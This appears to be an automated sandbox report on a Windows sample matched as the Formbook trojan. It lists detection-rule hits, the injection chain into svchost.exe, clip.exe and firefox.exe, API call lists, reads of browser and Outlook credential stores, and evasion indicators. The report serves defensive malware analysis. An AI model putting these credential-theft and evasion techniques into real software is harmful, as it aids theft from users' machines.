            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@5/4
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084CE7A GetLastError,FormatMessageW,0_2_0084CE7A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083AB84 AdjustTokenPrivileges,CloseHandle,0_2_0083AB84
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0083B134
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0084E1FD
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00846532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00846532
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0085C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0085C18C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0080406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0080406B
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeFile created: C:\Users\user\AppData\Local\Temp\aut4C01.tmpJump to behavior
            Source: s7Okni1gfE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000007.00000003.2150365691.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000003020000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: s7Okni1gfE.exeReversingLabs: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\s7Okni1gfE.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"Jump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: s7Okni1gfE.exeStatic file information: File size 1226752 > 1048576
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: s7Okni1gfE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WNGaDiurNI.exe, 00000006.00000000.1885629336.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, WNGaDiurNI.exe, 00000008.00000002.2714957354.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: s7Okni1gfE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: s7Okni1gfE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: s7Okni1gfE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: s7Okni1gfE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: s7Okni1gfE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081E01E LoadLibraryA,GetProcAddress,0_2_0081E01E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00826B05 push ecx; ret 0_2_00826B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040205A push esi; retf 2_2_00402076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041405F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402026 push ecx; retf 2_2_0040202D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401888 pushfd ; ret 2_2_004018D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041409F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004139CC push ebx; retf 2_2_004139CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042327B pushfd ; retf 2_2_00423286
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AC3 push 00000045h; iretd 2_2_00417ACA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032D0 push eax; ret 2_2_004032D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407307 push esp; ret 2_2_00407310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC43 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A450 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC35 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004084CC pushad ; iretd 2_2_004084CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CDD push ecx; retf 2_2_00401CDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4A7 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E8 push BC462628h; iretd 2_2_00418778
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ecx; ret 2_2_004186E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418779 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E7AC push ebx; iretd 2_2_0041E7AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D533E1 pushfd ; retf 6_2_02D533EC
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D4538E push esi; ret 6_2_02D45396
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D488DF push ds; retf 6_2_02D488F0
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D4884E push BC462628h; iretd 6_2_02D488DE
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00868111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00868111
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0081EB42
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0082123A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeAPI/Special instruction interceptor: Address: 11B3D44
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9728Jump to behavior
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeEvaded block: after key decisiongraph_0-94136
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280Thread sleep count: 246 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280Thread sleep time: -492000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280Thread sleep count: 9728 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 4280Thread sleep time: -19456000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe TID: 4940Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00846CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00846CA9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_008460DD
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_008463F9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084EB60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084F5FA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084F56F FindFirstFileW,FindClose,0_2_0084F56F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00851B2F
